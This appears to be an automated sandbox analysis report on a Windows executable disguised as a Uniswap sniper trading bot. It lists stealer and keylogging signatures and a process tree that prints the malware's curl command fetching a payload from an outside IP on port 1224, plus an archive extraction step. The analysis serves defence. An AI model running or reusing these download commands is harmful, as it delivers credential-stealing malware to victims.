Edit tour
Windows
Analysis Report
my2gf4tNEk.exe
Overview
General Information
| Sample name: | my2gf4tNEk.exerenamed because original name is a hash value |
| Original sample name: | f91bb20852c14222a0c193ce50c7042d.exe |
| Analysis ID: | 1568606 |
| MD5: | f91bb20852c14222a0c193ce50c7042d |
| SHA1: | 748d01320660cfe183d5fa06165c82b1797a94b6 |
| SHA256: | a2190824ca378c0de1a97170032ba64a5c456db3071edeaab701075365990af1 |
| Tags: | exeuser-smica83 |
| Infos: |  |
 | |
Detection
| Score: | 52 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
AI detected suspicious sample
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
my2gf4tNEk.exe (PID: 4088 cmdline: "C:\Users\ user\Deskt op\my2gf4t NEk.exe" MD5: F91BB20852C14222A0C193CE50C7042D) 
cmd.exe (PID: 1464 cmdline: "C:\Window s\system32 \cmd.exe" /c tasklis t /FI "USE RNAME eq % USERNAME%" /FI "IMAG ENAME eq u niswap-sni per-bot-wi th-gui.exe " /FO csv | "C:\Wind ows\system 32\find.ex e" "uniswa p-sniper-b ot-with-gu i.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
tasklist.exe (PID: 5952 cmdline: tasklist / FI "USERNA ME eq user " /FI "IMA GENAME eq uniswap-sn iper-bot-w ith-gui.ex e" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1) - find.exe (PID: 5160 cmdline:
"C:\Window s\system32 \find.exe" "uniswap- sniper-bot -with-gui. exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
uniswap-sniper-bot-with-gui.exe (PID: 3080 cmdline: "C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" MD5: 2940B5A37A1E25EC8B2E0AD5943CD934) - cmd.exe (PID: 6316 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "cu rl -Lo "C: \Users\use r\AppData\ Local\Temp \p.zi" "ht tp://185.1 53.182.241 :1224/pdow n"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 5828 cmdline:
curl -Lo " C:\Users\u ser\AppDat a\Local\Te mp\p.zi" " http://185 .153.182.2 41:1224/pd own" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - uniswap-sniper-bot-with-gui.exe (PID: 5752 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- user-data- dir="C:\Us ers\user\A ppData\Roa ming\unisw ap-sniper- bot-with-g ui" --gpu- preference s=UAAAAAAA AADgAAAYAA AAAAAAAAAA AAAAAABgAA AAAAAwAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAAAA AAAAAAAEgA AAAAAAAASA AAAAAAAAAY AAAAAgAAAB AAAAAAAAAA GAAAAAAAAA AQAAAAAAAA AAAAAAAOAA AAEAAAAAAA AAABAAAADg AAAAgAAAAA AAAACAAAAA AAAAA= --m ojo-platfo rm-channel -handle=17 44 --field -trial-han dle=1912,i ,124401259 1723422604 0,14168537 8558686658 04,131072 --disable- features=S pareRender erForSiteP erProcess, WinRetriev eSuggestio nsOnlyOnDe mand /pref etch:2 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934) 
explorer.exe (PID: 4004 cmdline: C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - uniswap-sniper-bot-with-gui.exe (PID: 1096 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=util ity --util ity-sub-ty pe=network .mojom.Net workServic e --lang=e n-GB --ser vice-sandb ox-type=no ne --user- data-dir=" C:\Users\u ser\AppDat a\Roaming\ uniswap-sn iper-bot-w ith-gui" - -mojo-plat form-chann el-handle= 2052 --fie ld-trial-h andle=1912 ,i,1244012 5917234226 040,141685 3785586866 5804,13107 2 --disabl e-features =SpareRend ererForSit ePerProces s,WinRetri eveSuggest ionsOnlyOn Demand /pr efetch:8 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934) - uniswap-sniper-bot-with-gui.exe (PID: 3180 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=rend erer --use r-data-dir ="C:\Users \user\AppD ata\Roamin g\uniswap- sniper-bot -with-gui" --app-pat h="C:\User s\user\App Data\Local \Programs\ uniswap-sn iper-bot-w ith-gui\re sources\ap p.asar" -- no-sandbox --no-zygo te --lang= en-GB --de vice-scale -factor=1 --num-rast er-threads =2 --enabl e-main-fra me-before- activation --rendere r-client-i d=4 --laun ch-time-ti cks=696634 0881 --moj o-platform -channel-h andle=2348 --field-t rial-handl e=1912,i,1 2440125917 234226040, 1416853785 5868665804 ,131072 -- disable-fe atures=Spa reRenderer ForSitePer Process,Wi nRetrieveS uggestions OnlyOnDema nd /prefet ch:1 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934) - cmd.exe (PID: 416 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "cu rl -Lo "C: \Users\use r\AppData\ Local\Temp \p.zi" "ht tp://185.1 53.182.241 :1224/pdow n"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - curl.exe (PID: 528 cmdline:
curl -Lo " C:\Users\u ser\AppDat a\Local\Te mp\p.zi" " http://185 .153.182.2 41:1224/pd own" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 5912 cmdline:
C:\Windows \system32\ cmd.exe /d /s /c "ta r -xf C:\U sers\user\ AppData\Lo cal\Temp\p 2.zip -C C :\Users\us er" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6900 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tar.exe (PID: 1484 cmdline:
tar -xf C: \Users\use r\AppData\ Local\Temp \p2.zip -C C:\Users\ user MD5: 3596DC15B6F6CBBB6EC8B143CBD57F24) - uniswap-sniper-bot-with-gui.exe (PID: 7040 cmdline:
"C:\Users\ user\AppDa ta\Local\P rograms\un iswap-snip er-bot-wit h-gui\unis wap-sniper -bot-with- gui.exe" - -type=gpu- process -- disable-gp u-sandbox --use-gl=d isabled -- gpu-vendor -id=5140 - -gpu-devic e-id=140 - -gpu-sub-s ystem-id=0 --gpu-rev ision=0 -- gpu-driver -version=1 0.0.19041. 546 --user -data-dir= "C:\Users\ user\AppDa ta\Roaming \uniswap-s niper-bot- with-gui" --gpu-pref erences=UA AAAAAAAADo AAAYAAAAAA AAAAAAAAAA AABgAAAAAA AwAAAAAAAA AAAAAACAAA AAAAAAAAAA AAAAAAAAAA AAAEgAAAAA AAAASAAAAA AAAAAYAAAA AgAAABAAAA AAAAAAGAAA AAAAAAAQAA AAAAAAAAAA AAAOAAAAEA AAAAAAAAAB AAAADgAAAA gAAAAAAAAA CAAAAAAAAA A= --mojo- platform-c hannel-han dle=2252 - -field-tri al-handle= 1912,i,124 4012591723 4226040,14 1685378558 68665804,1 31072 --di sable-feat ures=Spare RendererFo rSitePerPr ocess,WinR etrieveSug gestionsOn lyOnDemand /prefetch :2 MD5: 2940B5A37A1E25EC8B2E0AD5943CD934)
- cleanup
⊘No configs have been found
⊘No yara matches
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |   |
|---|
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Static PE information: | ||
| Source: | Registry value created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | File created: | Jump to behavior | ||
| Source: | Static PE information: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
| Source: | File opened: | Jump to behavior | ||
Networking | |
|---|
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | IP Address: | ||
| Source: | IP Address: | ||
| Source: | HTTP traffic detected: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | TCP traffic detected without corresponding DNS query: | ||
| Source: | HTTP traffic detected: | ||